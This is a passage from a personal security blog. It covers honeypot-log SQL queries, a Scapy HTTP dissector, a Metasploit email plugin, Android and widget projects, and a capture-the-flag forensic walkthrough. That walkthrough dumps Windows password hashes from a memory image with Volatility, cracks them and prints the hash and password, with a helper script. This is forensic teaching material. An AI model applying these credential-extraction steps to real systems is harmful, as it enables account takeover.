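# made-up sample data, not honeypot output.
SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY, local_port INTEGER, remote_host TEXT);
CREATE TABLE dcerpcservices (
    dcerpcservice INTEGER PRIMARY KEY, dcerpcservice_name TEXT);
CREATE TABLE dcerpcserviceops (
    dcerpcserviceop INTEGER PRIMARY KEY, dcerpcservice INTEGER,
    dcerpcserviceop_name TEXT, dcerpcserviceop_vuln TEXT);
CREATE TABLE downloads (
    download INTEGER PRIMARY KEY, connection INTEGER,
    download_url TEXT, download_md5_hash TEXT);
"""

SAMPLE_ROWS = [
    ("INSERT INTO connections VALUES (?, ?, ?)",
     [(1, 135, "192.0.2.10"), (2, 445, "192.0.2.11"), (3, 135, "192.0.2.12")]),
    ("INSERT INTO dcerpcservices VALUES (?, ?)",
     [(1, "SRVSVC"), (2, "DCOM"), (3, "EPMAP")]),
    # An empty vuln column means the operation was called but is not tied to
    # a known vulnerability; that is what the post's "is not ''" filter drops.
    ("INSERT INTO dcerpcserviceops VALUES (?, ?, ?, ?)",
     [(1, 1, "NetPathCanonicalize", "MS08-67"),
      (2, 1, "NetShareEnumAll", ""),
      (3, 2, "RemoteActivation", "MS03-26"),
      (4, 3, "ept_map", "")]),
    # Two URLs delivering the same (constructed) hash, a common pattern.
    ("INSERT INTO downloads VALUES (?, ?, ?, ?)",
     [(1, 1, "tftp://192.0.2.10/update.exe", "d41d8cd98f00b204e9800998ecf8427e"),
      (2, 3, "tftp://192.0.2.12/svchost.exe", "d41d8cd98f00b204e9800998ecf8427e")]),
]


def open_sample_db():
    """Create the in-memory database and load the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    for stmt, rows in SAMPLE_ROWS:
        con.executemany(stmt, rows)
    con.commit()
    return con


def exploited_rpc_ops(con):
    """The post's RPC query: service, operation and MS bulletin for every
    operation that carries a vulnerability tag."""
    return con.execute("""
        SELECT s.dcerpcservice_name, o.dcerpcserviceop_name, o.dcerpcserviceop_vuln
        FROM dcerpcservices AS s
        JOIN dcerpcserviceops AS o ON s.dcerpcservice = o.dcerpcservice
        WHERE o.dcerpcserviceop_vuln IS NOT NULL AND o.dcerpcserviceop_vuln != ''
        ORDER BY s.dcerpcservice_name, o.dcerpcserviceop_name""").fetchall()


def downloads_by_port(con):
    """The post's malware-URL query: URL, MD5 and the honeypot port the
    delivering connection came in on."""
    return con.execute("""
        SELECT d.download_url, d.download_md5_hash, c.local_port
        FROM downloads AS d
        JOIN connections AS c ON d.connection = c.connection
        ORDER BY d.download""").fetchall()


def downloads_per_port(con):
    """Count downloads per local port: a quick check of the observation that
    every sample arrived through a port 135 session."""
    rows = con.execute("""
        SELECT c.local_port, COUNT(*)
        FROM downloads AS d
        JOIN connections AS c ON d.connection = c.connection
        GROUP BY c.local_port""").fetchall()
    return dict(rows)


def unique_samples(con):
    """Distinct MD5 hashes: several URLs often deliver the same binary."""
    return [r[0] for r in
            con.execute("SELECT DISTINCT download_md5_hash FROM downloads").fetchall()]


if __name__ == "__main__":
    db = open_sample_db()
    for row in exploited_rpc_ops(db):
        print(*row)
    print(downloads_per_port(db), unique_samples(db))
```

Against a real logsql.sqlite you would replace open_sample_db() with sqlite3.connect(path); the query functions are unchanged, since they only use the column names the post's own queries rely on.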
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com1tag:blogger.com,1999:blog-6555208034441643895.post-72384658290274974982011-06-23T00:25:00.001+02:002012-01-26T00:13:09.905+01:00HTTP support in Scapy<i>"Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.)." <a class="vt-p" href="http://www.secdev.org/projects/scapy/">http://www.secdev.org/projects/scapy/</a></i><br />
<div>
<br /></div>
<div>
<a class="vt-p" href="http://www.secdev.org/projects/scapy/doc/index.html">Scapy's documentation</a> is very useful to learn <a class="vt-p" href="http://www.secdev.org/projects/scapy/doc/usage.html">how to use it</a> and <a class="vt-p" href="http://www.secdev.org/projects/scapy/doc/build_dissect.html">how to add new protocols</a>. To become more familiar with this great tool, I decided to try to implement one of the most used protocols: HTTP (<a class="vt-p" href="http://tools.ietf.org/html/rfc2616">RFC 2616</a>).</div>
<div>
<blockquote>
steeve-pc:blog steeve$ ./HTTP.py<br />
Welcome to Scapy (2.2.0)<br />
HTTP Scapy extension<br />
>>> test=rdpcap("HTTP.pcap")<br />
>>> test.summary()<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http S<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 SA<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http PA / HTTP / HTTPrequest / Raw<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / HTTPresponse / Raw<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / Raw<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / Raw<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 PA / HTTP / Raw<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A<br />
[...]</blockquote>
</div>
<div>
The summary() function shows the content of each packet, and here we can see that some packets carry interesting layers: HTTP, HTTPrequest and HTTPresponse. The HTTP layer holds the fields that can appear in either of the two other layers, such as the Date or Connection headers. The HTTPrequest layer corresponds to HTTP requests (GET, POST, TRACE, HEAD...) and HTTPresponse to responses such as "200 OK" or "404 Not Found".</div>
<div>
<br /></div>
<div>
We can look at the content of the packet containing the HTTPrequest layer:</div>
<div>
<blockquote>
>>> test[3].show()<br />
###[ Ethernet ]###<br />
dst= fe:ff:20:00:01:00<br />
src= 00:00:01:00:00:00<br />
type= 0x800<br />
###[ IP ]###<br />
version= 4L<br />
ihl= 5L<br />
tos= 0x0<br />
len= 519<br />
id= 3909<br />
flags= DF<br />
frag= 0L<br />
ttl= 128<br />
proto= tcp<br />
chksum= 0x9010<br />
src= 145.254.160.237<br />
dst= 65.208.228.223<br />
\options\<br />
###[ TCP ]###<br />
sport= tip2<br />
dport= http<br />
seq= 951057940<br />
ack= 290218380<br />
dataofs= 5L<br />
reserved= 0L<br />
flags= PA<br />
window= 9660<br />
chksum= 0xa958<br />
urgptr= 0<br />
options= []<br />
###[ HTTP ]###<br />
CacheControl= None<br />
Connection= 'Connection: keep-alive\r\n'<br />
Date= None<br />
Pragma= None<br />
Trailer= None<br />
TransferEncoding= None<br />
Upgrade= None<br />
Via= None<br />
Warning= None<br />
KeepAlive= 'Keep-Alive: 300\r\n'<br />
Allow= None<br />
ContentEncoding= None<br />
ContentLanguage= None<br />
ContentLength= None<br />
ContentLocation= None<br />
ContentMD5= None<br />
ContentRange= None<br />
ContentType= None<br />
Expires= None<br />
LastModified= None<br />
###[ HTTP Request ]###<br />
Method= 'GET /download.html HTTP/1.1\r\n'<br />
Host= 'Host: www.ethereal.com\r\n'<br />
UserAgent= 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113\r\n'<br />
Accept= 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n'<br />
AcceptLanguage= 'Accept-Language: en-us,en;q=0.5\r\n'<br />
AcceptEncoding= 'Accept-Encoding: gzip,deflate\r\n'<br />
AcceptCharset= 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'<br />
Referer= 'Referer: http://www.ethereal.com/development.html\r\n'<br />
Authorization= None<br />
Expect= None<br />
From= None<br />
IfMatch= None<br />
IfModifiedSince= None<br />
IfNoneMatch= None<br />
IfRange= None<br />
IfUnmodifiedSince= None<br />
MaxForwards= None<br />
ProxyAuthorization= None<br />
Range= None<br />
TE= None<br />
###[ Raw ]###<br />
load= '\r\n'</blockquote>
</div>
<div>
<br />
Now we can easily manipulate HTTP packets with Scapy. Here, I filter the packets that have an HTTPrequest or HTTPresponse layer and then print some fields:<br />
<blockquote>
<br />
>>> http=test.filter(lambda(s): HTTPrequest in s or HTTPresponse in s)<br />
>>> http.summary()<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http PA / HTTP / HTTPrequest / Raw<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / HTTPresponse / Raw<br />
Ether / IP / TCP 145.254.160.237:3371 > 216.239.59.99:http PA / HTTP / HTTPrequest / Raw<br />
Ether / IP / TCP 216.239.59.99:http > 145.254.160.237:3371 PA / HTTP / HTTPresponse / Raw<br />
Ether / IP / TCP 216.239.59.99:http > 145.254.160.237:3371 PA / HTTP / HTTPresponse / Raw<br />
>>> for p in http.filter(lambda(s): HTTPrequest in s):<br />
... print p.Method, p.Host<br />
...<br />
GET /download.html HTTP/1.1<br />
Host: www.ethereal.com<br />
GET /pagead/ads?client=ca-pub-2309191948673629&random=1084443430285&lmt=1082467020&format=468x60_as&output=html&url=http%3A%2F%2Fwww.ethereal.com%2Fdownload.html&color_bg=FFFFFF&color_text=333333&color_link=000000&color_url=666633&color_border=666633 HTTP/1.1<br />
Host: pagead2.googlesyndication.com<br />
>>> for p in http.filter(lambda(s): HTTPresponse in s):<br />
... print p.StatusLine, p.Server<br />
...<br />
HTTP/1.1 200 OK<br />
Server: Apache<br />
HTTP/1.1 200 OK<br />
Server: CAFE/1.0<br />
HTTP/1.1 200 OK<br />
Server: CAFE/1.0<br />
>>> </blockquote>
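For readers who want the same request/response split without loading the whole Scapy extension, here is an added example in plain Python (my own code, not the script from this post): it classifies a TCP payload as an HTTP request, an HTTP response or neither (which is what Scapy leaves as a Raw layer), parses the header fields, and reproduces the method/Host and status/Server listing above. The segments are constructed inline; only the GET request is borrowed from the capture shown earlier, the source port 3372 and the response are made up, and no pcap is read.

```python
import re

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/(\d\.\d)$")
STATUS_LINE = re.compile(r"^HTTP/(\d\.\d) (\d{3}) ?(.*)$")


def parse_http(payload):
    """Classify a TCP payload. Returns a dict with kind == "request" or
    "response" plus the parsed start line and headers, or None when the bytes
    are not the start of an HTTP message (a body continuation segment, a bare
    ACK, binary data ...), which is what shows up as Raw in Scapy."""
    text = payload.decode("iso-8859-1")          # never fails: 1 byte = 1 char
    head, sep, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if m:
        msg = {"kind": "request", "Method": m.group(1),
               "Path": m.group(2), "Version": m.group(3)}
    else:
        m = STATUS_LINE.match(lines[0])
        if not m:
            return None
        msg = {"kind": "response", "Version": m.group(1),
               "Status": int(m.group(2)), "Reason": m.group(3)}
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, colon, value = line.partition(":")
        if not colon:
            return None                           # malformed header: treat as Raw
        headers[name.strip().lower()] = value.strip()
    msg["headers"] = headers
    msg["body"] = body.encode("iso-8859-1") if sep else b""
    return msg


# Constructed segments: (src, sport, dst, dport, payload). The GET is the one
# from the capture above; the port number, the response and the rest are made
# up for the demo.
SAMPLE_SEGMENTS = [
    ("145.254.160.237", 3372, "65.208.228.223", 80, b""),                  # SYN: no payload
    ("145.254.160.237", 3372, "65.208.228.223", 80,
     b"GET /download.html HTTP/1.1\r\nHost: www.ethereal.com\r\n"
     b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n"),
    ("65.208.228.223", 80, "145.254.160.237", 3372,
     b"HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: text/html\r\n\r\n<html>"),
    ("65.208.228.223", 80, "145.254.160.237", 3372, b"<body>more body</body>"),  # continuation
]


def http_messages(segments):
    """Keep only the segments that start an HTTP message (the post's filter)."""
    out = []
    for src, sport, dst, dport, payload in segments:
        msg = parse_http(payload)
        if msg is not None:
            out.append(((src, sport, dst, dport), msg))
    return out


def summarize(segments):
    """One line per message: method, path and Host for requests; status and
    Server for responses, like the two loops in the post."""
    lines = []
    for (src, sport, dst, dport), msg in http_messages(segments):
        if msg["kind"] == "request":
            lines.append("%s:%d > %s:%d %s %s Host=%s" % (
                src, sport, dst, dport, msg["Method"], msg["Path"],
                msg["headers"].get("host")))
        else:
            lines.append("%s:%d > %s:%d %d Server=%s" % (
                src, sport, dst, dport, msg["Status"], msg["headers"].get("server")))
    return lines


if __name__ == "__main__":
    for line in summarize(SAMPLE_SEGMENTS):
        print(line)
```

The two regular expressions are deliberately strict about the start line: a segment that merely contains "HTTP" somewhere in a body is not promoted to a message, which is the same decision the Scapy dissector has to make when it chooses between binding an HTTP layer and leaving Raw.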
My script can be downloaded <a class="vt-p" href="https://sites.google.com/site/steevebarbeau/home/HTTP.py-1?attredirects=0&d=1" target="_blank">here</a>. Don't hesitate to give me your opinion or to improve my script ;) </div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com5tag:blogger.com,1999:blog-6555208034441643895.post-45741424212120235702011-03-19T13:12:00.000+01:002011-03-19T13:12:50.871+01:00Get password from memory dumpTo explain how we can get a password from a memory dump, I will use forensic challenge #2 from <a class="vt-p" href="http://wargame.nuitduhack.com/">"Nuit du Hack 2010"</a> as an example. <br />
Aim: extract the Administrator password from the Windows XP memory dump<br />
<br />
We will use a great tool to extract this password: <a class="vt-p" href="http://code.google.com/p/volatility/">Volatility</a>. Volatility has a plugin called "hashdump" that extracts password hashes. Before we can use it, though, we have to locate the virtual addresses of the SYSTEM and SAM hives.<br />
<br />
Find the physical addresses of the registry hives (hivescan plugin):<br />
<br />
user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hivescan<br />
Volatile Systems Volatility Framework 1.4_rc1<br />
Offset (hex) <br />
44666888 0x02a99008<br />
44694368 0x02a9fb60<br />
[...]<br />
380343784 0x16ab95e8<br />
424820744 0x19524008<br />
<br />
Then locate the virtual addresses (hivelist plugin):<br />
<br />
user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hivelist<br />
Volatile Systems Volatility Framework 1.4_rc1<br />
Virtual Physical Name<br />
0xe1cf9008 0x19524008 \??\C:\Documents and Settings\mr_esclave\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat<br />
[...]<br />
0xe15fdb60 0x0688ab60 \Device\HarddiskVolume1\WINDOWS\system32\config\software<br />
0xe15ebb60 0x06708b60 \Device\HarddiskVolume1\WINDOWS\system32\config\default<br />
0xe15fd008 0x0688a008 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY<br />
<b>0xe15f2658</b> 0x066cf658 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM<br />
0xe12eb288 0x02d58288 [no name]<br />
<b>0xe1035b60</b> 0x02a9fb60 \Device\HarddiskVolume1\WINDOWS\system32\config\system<br />
0xe102e008 0x02a99008 [no name]<br />
0x8066e904 0x0066e904 [no name]<br />
<br />
Now that we have the SYSTEM and SAM virtual addresses, we can run the hashdump plugin:<br />
<br />
user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hashdump -y <b>0xe1035b60</b> -s <b>0xe15f2658</b><br />
Volatile Systems Volatility Framework 1.4_rc1<br />
Administrateur:500:a94c6377a507e293d87f0f06a65161cd:ca5cf9cfc07ec43a78d00bc936242594:::<br />
<br />
The last step is to use ophcrack with rainbow tables to crack this password:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbAJJYLvvGG6HMI5-CRFEGneutPOOzNRnnQaQ_HVGw7VzZgtgWImVoG6czvyDeeqrBYwuj4WT2ThsOv7QQRo-7A_TxOz0G-asAlhhV5IDHpGUoJqs9MPzgVDmwZVbGtknvbUopvUhl59ui/s1600/Screen+shot+2011-03-18+at+9.09.37+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbAJJYLvvGG6HMI5-CRFEGneutPOOzNRnnQaQ_HVGw7VzZgtgWImVoG6czvyDeeqrBYwuj4WT2ThsOv7QQRo-7A_TxOz0G-asAlhhV5IDHpGUoJqs9MPzgVDmwZVbGtknvbUopvUhl59ui/s320/Screen+shot+2011-03-18+at+9.09.37+PM.png" width="320" /></a></div><br />
We have easily obtained the Administrator's password, which is "cuirmoustache".<br />
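To make the two look-ups in this procedure repeatable, here is an added example (my own code, not Volatility's): it picks the SYSTEM and SAM virtual offsets out of a hivelist listing, assembles the hashdump command line used above, and then parses hashdump's pwdump-style output to flag the accounts whose LM hash is still stored, which is exactly why ophcrack's rainbow tables finish so quickly here. The hivelist excerpt and the Administrateur line are copied from the output above; the Guest and mr_esclave hash lines are constructed for the demo, and the two marker constants are the well-known LM and NT hashes of an empty password.

```python
import re

# Excerpt of the hivelist output shown above (row layout: virtual, physical, name).
HIVELIST_OUTPUT = """Virtual Physical Name
0xe15fdb60 0x0688ab60 \\Device\\HarddiskVolume1\\WINDOWS\\system32\\config\\software
0xe15f2658 0x066cf658 \\Device\\HarddiskVolume1\\WINDOWS\\system32\\config\\SAM
0xe12eb288 0x02d58288 [no name]
0xe1035b60 0x02a9fb60 \\Device\\HarddiskVolume1\\WINDOWS\\system32\\config\\system
0x8066e904 0x0066e904 [no name]
"""

# hashdump output in pwdump format: user:rid:lmhash:nthash:::  The first
# account line is the one from the post; the other two are constructed.
HASHDUMP_OUTPUT = """Volatile Systems Volatility Framework 1.4_rc1
Administrateur:500:a94c6377a507e293d87f0f06a65161cd:ca5cf9cfc07ec43a78d00bc936242594:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mr_esclave:1003:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

HIVE_ROW = re.compile(r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(.*)$")
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # "no LM hash stored" marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password


def find_hive_offsets(listing):
    """Return {"system": vaddr, "sam": vaddr} from a hivelist listing, keyed by
    the last path component of the hive name."""
    found = {}
    for line in listing.splitlines():
        m = HIVE_ROW.match(line.strip())
        if not m:
            continue                 # banner, header or blank line
        vaddr, _paddr, name = m.groups()
        base = name.rsplit("\\", 1)[-1].lower()
        if base in ("system", "sam") and name.lower().endswith("\\config\\" + base):
            found[base] = vaddr
    return found


def hashdump_command(dump, profile, offsets):
    """The hashdump invocation from the post, as an argv list."""
    return ["python", "volatility.py", "-f", dump, "--profile=" + profile,
            "hashdump", "-y", offsets["system"], "-s", offsets["sam"]]


def parse_hashdump(output):
    """Parse pwdump lines and annotate each account with the two facts that
    decide how cheap it is to crack."""
    accounts = []
    for line in output.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue                 # framework banner or other noise
        lm, nt = parts[2].lower(), parts[3].lower()
        accounts.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt,
                         "lm_stored": lm != EMPTY_LM,
                         "empty_password": nt == EMPTY_NT})
    return accounts


def weak_accounts(accounts):
    """Accounts with an LM hash on record (rainbow-table territory, as with the
    Administrator above) or with an empty password."""
    return [a["user"] for a in accounts if a["lm_stored"] or a["empty_password"]]


if __name__ == "__main__":
    offsets = find_hive_offsets(HIVELIST_OUTPUT)
    print(" ".join(hashdump_command("../xp_forensics.vmem", "WinXPSP3x86", offsets)))
    print(weak_accounts(parse_hashdump(HASHDUMP_OUTPUT)))
```

The lm_stored flag is the one to watch on a real system: an account whose dump shows anything other than the empty-LM marker still has a LanManager hash on disk, so disabling LM hash storage (or using passwords longer than 14 characters) is the mitigation that makes this rainbow-table step fail.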
<br />
<br />
Nuit du Hack challenges : <a class="vt-p" href="http://wargame.nuitduhack.com/">http://wargame.nuitduhack.com/</a><br />
Volatility plugin list: <a class="vt-p" href="http://code.google.com/p/volatility/wiki/CommandReference">http://code.google.com/p/volatility/wiki/CommandReference</a>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-64866357091919651292011-02-27T15:13:00.002+01:002011-02-27T15:23:59.094+01:00Use Metasploit as email clientThis Metasploit plugin is my first piece of Ruby code and is a very basic email client. With this plugin you can send emails (over SMTP) and retrieve unread mails over IMAP. <a class="vt-p" href="https://sites.google.com/site/steevebarbeau/home/mail_client.rb?attredirects=0&d=1">Download my Metasploit plugin</a>.<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Send mails:</span></b><br />
<br />
msf > load mail_client<br />
[*] Mail Client plugin loaded.<br />
[*] Successfully loaded plugin: MailClient<br />
msf > send_mail<br />
Enter your smtp password :<br />
Use ';' for multiple recipients<br />
To : email@mail.com<br />
Subject : Test metasploit plugin<br />
Message :<br />
Is my plugin working ?? We will see ...<br />
<br />
Send ...<br />
msf ><br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Get mails:</span></b><br />
<br />
msf > get_mails<br />
<br />
0. Sun, 27 Feb 2011 00:11:58 +0000 - Test metasploit plugin<br />
? read 0<br />
Is my plugin working ?? We will see ...<br />
<br />
Sent from Metasploit<br />
----------<br />
? help<br />
read X<br />
list<br />
help<br />
exit<br />
?<br />
<br />
This plugin uses the basic Net::IMAP class from Ruby, so authentication is limited to the "LOGIN" and "CRAM-MD5" mechanisms. I have not added <a class="vt-p" href="http://code.google.com/apis/gmail/oauth/">OAUTH</a>, used by Gmail, or other kinds of "high-level" authentication methods.Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-85837331037313391772010-10-06T00:10:00.004+02:002011-02-27T15:16:18.666+01:00My first Android application<div style="text-align: justify;">After writing my previous article, I wanted to try developing for Google's mobile OS: Android. The purpose of this article is therefore to share my small application with the people of Rouen who may need it.</div><br />
Download link: <a class="vt-p" href="http://code.google.com/p/rouentransport/downloads/detail?name=TCAR.apk&can=2&q=">http://code.google.com/p/rouentransport/downloads/detail?name=TCAR.apk&can=2&q=</a><br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVH-8ulTzikAG0s7w8Kws-SdJGhnyON5LlKSisA8VCwj8CUdtkgKFfSkKJuORQ5OpQbJgrb7jl5-XP_Y5l0qJfoUidpXonuS4arj-GyR7webPoElvxL0H6R2PLBoLLdv0Q9xGqZDZN1G1S/s1600/device.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVH-8ulTzikAG0s7w8Kws-SdJGhnyON5LlKSisA8VCwj8CUdtkgKFfSkKJuORQ5OpQbJgrb7jl5-XP_Y5l0qJfoUidpXonuS4arj-GyR7webPoElvxL0H6R2PLBoLLdv0Q9xGqZDZN1G1S/s320/device.png" width="111" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Application</td></tr>
</tbody></table><span class="Apple-style-span"><b><span class="Apple-style-span" style="font-size: x-large;">The application and the widget</span></b></span><br />
<br />
<div style="text-align: justify;">First of all, I want to make several things clear about my project:</div><div style="text-align: justify;"> - the design of the application was not my priority</div><div style="text-align: justify;"> - the reliability of the timetables displayed by the application and the widget does not depend on me but on TCAR (the public transport company of the Rouen metropolitan area). Moreover, the timetables of some lines are "real-time" while others are fixed and therefore do not take possible delays into account.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">The application displays the scheduled departure time according to the direction (terminus) you have chosen and the stop where you are.</div><div style="text-align: justify;"><br />
<br />
</div><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi38N8cd-i_M4Ca39ydgUdFl-bu6TGChBYZ9rW3n-5-8G5x8hP3rmOjgYL-5xlTiuMMAOE5nWsDuvLIFwq3CMcENKTs6hKX5SnSeMFVKjwO9TBWz2Afod4jOmfGwXGeZE679H8At5pzfpAi/s1600/device2.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi38N8cd-i_M4Ca39ydgUdFl-bu6TGChBYZ9rW3n-5-8G5x8hP3rmOjgYL-5xlTiuMMAOE5nWsDuvLIFwq3CMcENKTs6hKX5SnSeMFVKjwO9TBWz2Afod4jOmfGwXGeZE679H8At5pzfpAi/s200/device2.png" width="111" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Widget configuration</td></tr>
</tbody></table><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDn0ObyggHC8W4L9yEZaUY39cDrV2Yrh7ETvuCjBjrQi1XQOuKDuN1XCXzM00_t3RtPekCnByadZy0HjleTMTfsIxwBiYmPJjV1fbd1r8kOb47_1pp2f_fDp31lKgR1AcGmUNVZhmuc4dV/s1600/device3.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDn0ObyggHC8W4L9yEZaUY39cDrV2Yrh7ETvuCjBjrQi1XQOuKDuN1XCXzM00_t3RtPekCnByadZy0HjleTMTfsIxwBiYmPJjV1fbd1r8kOb47_1pp2f_fDp31lKgR1AcGmUNVZhmuc4dV/s200/device3.png" width="111" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Widget</td></tr>
</tbody></table><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">The widget displays the same information as the application, with the additional option of refreshing it automatically every X minutes.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">PS: testing was done on a Motorola Milestone only, so bugs may exist on other models.</div><br />
<br />
<br />
<b><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: x-large;">Installation</span></span></b><br />
<div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Since my application is not available on the Android Market, to install it you will have to allow the installation of applications from unknown sources (Settings>Applications>Unknown sources). </div><div style="text-align: justify;">Then, to install it, you can use AppMonster for example (available on the Market). This application lets you install an application from an .apk file. To do so, in the AppMonster menu, go to Install>Whole SD, then select TCAR and click Install.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
<br />
</div><div style="text-align: justify;">If you liked my application, if you want to give feedback, if you find bugs... don't hesitate to leave me a comment.</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-88847253848451841562010-09-17T23:53:00.004+02:002010-09-19T16:34:47.790+02:00Making use of the code of an iGoogle widget<div style="text-align: justify;">Having recently moved to Rouen for my studies, one of my first needs was to be able to check the city's public transport timetables. Unfortunately, I did not find any application fulfilling this role for my Android phone. The only thing I found was a <a class="vt-p" href="http://www.google.com/ig/adde?source=atgs&moduleurl=www.tcar.fr/gadget/gadget.xml">link</a> to an iGoogle widget. This widget shows the various disruptions on the transport network as well as the times of the next metros, trams, buses... So I studied how it works in order to obtain what I was looking for, namely the transport timetables.</div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="http://www.tcar.fr/gadget/img/tcar_screenshot_horaire.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://www.tcar.fr/gadget/img/tcar_screenshot_horaire.png" /></a></div><b><span class="Apple-style-span" style="font-size: x-large;">1 - Analysis of the widget</span></b><br />
<br />
<div style="text-align: justify;">The widget is located at the following address (http://www.tcar.fr/gadget/gadget.xml). This file contains a number of things, including the addresses of images, of a style sheet and of a JavaScript file... The latter is in fact the most important element of the widget, because it is in this file that we find all the functions that make the widget interactive and return information to the user.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">The interesting functions of the JavaScript file (<i>http://www.tcar.fr/gadget/_js/widgetEngine.js</i>) are the following:</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">- getLines() returns information (line id, line number, type, pictogram) about each line of the network (metro, THEOR, bus, taxi...)</div><i>www.tcar.fr/gadget/getAllLinesWithType.asp</i><br />
<div><br />
